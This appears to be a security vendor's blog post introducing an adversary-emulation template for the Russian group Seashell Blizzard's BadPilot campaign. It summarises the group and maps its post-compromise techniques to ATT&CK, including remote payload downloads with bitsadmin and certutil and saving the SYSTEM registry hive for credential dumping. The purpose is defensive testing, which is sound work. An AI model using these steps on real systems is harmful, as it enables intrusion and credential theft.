Seashell Blizzard also known as APT44, Sandworm, and Voodoo Bear, is a highly sophisticated Russian adversary linked to the Russian Military Intelligence Unit 74455 (GRU). Since at least 2009, Seashell Blizzard has targeted organizations across the United States, Canada, Australia, Europe, Central Asia, and the Middle East, focusing on sectors such as energy, telecommunications, government, military, transportation, manufacturing, and retail. Seashell Blizzard operations are characterized by persistent, long-term access to victim networks, employing a range of publicly available and custom-developed tools to conduct espionage activities. The group has a particular focus on Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) systems, with their attacks resulting in significant disruptions to critical infrastructure, including energy distribution systems.

AttackIQ has released a new assessment template that brings together the post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by Seashell Blizzard during the BadPilot campaign to help customers validate their security controls and their ability to defend against this disruptive and destructive threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against recently active Russian APT activity.
  • Assess their security posture against an adversary focused on critical sectors.
  • Continuously validate detection and prevention pipelines against a threat that conducts espionage operations globally.

Seashell Blizzard – 2025-02 – The BadPilot Campaign

The BadPilot campaign is a sophisticated, long-running operation primarily focused on gaining initial access to targeted networks. The campaign is attributed to a Seashell Blizzard subgroup and is known for its strategic use of spear-phishing emails and exploiting vulnerabilities in software to breach networks. Once access is established, they typically provide a foothold for other threat actors within the group to conduct further exploitation and espionage activities.

This emulation reflects all post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by Seashell Blizzard during this campaign, as detailed in Microsoft’s investigation report published on February 12, 2025.

The assessment template is divided into tactics, grouping the techniques and implementations used by the group at each stage of their activities.

Persistence

Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Create or Modify System Process: Windows Service (T1543.003): This scenario leverages the native sc command line tool to create a new service and performs a query in order to verify if the service was correctly created.

Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

BITS Jobs (T1197): This scenario employs the bitsadmin native command to create a BITS job and configure it to download a remote payload. The Background Intelligent Transfer Service (BITS) is a mechanism used by legitimate applications to use a system’s idle bandwidth to retrieve files without disrupting other applications.

System Network Configuration Discovery: Internet Connection Discovery (T1016.001): This scenario executes the certutil utility to try and download a file from a website and save it to a temporary directory.

Credential Access

Consists of techniques used by adversaries to harvest credentials available on the compromised system.

OS Credential Dumping: Security Account Manager (T1003.002): This scenario attempts to save a copy of the HKLM\SYSTEM registry hive to a temporary file by executing the native Windows reg save command.

Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

System Owner/User Discovery (T1033): This scenario executes the native whoami command to receive details of the running user account.

System Information Discovery (T1082): This scenario executes the systeminfo command to collect information about the compromised system.

System Network Configuration Discovery (T1016): This scenario executes the arp -a command to retrieve the system’s Address Resolution Protocol (ARP) information, which can reveal valuable network details.

Command and Control

Consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection.

Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Wrap Up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by Seashell Blizzard. With data generated from continuous testing and the use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and disruptive threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.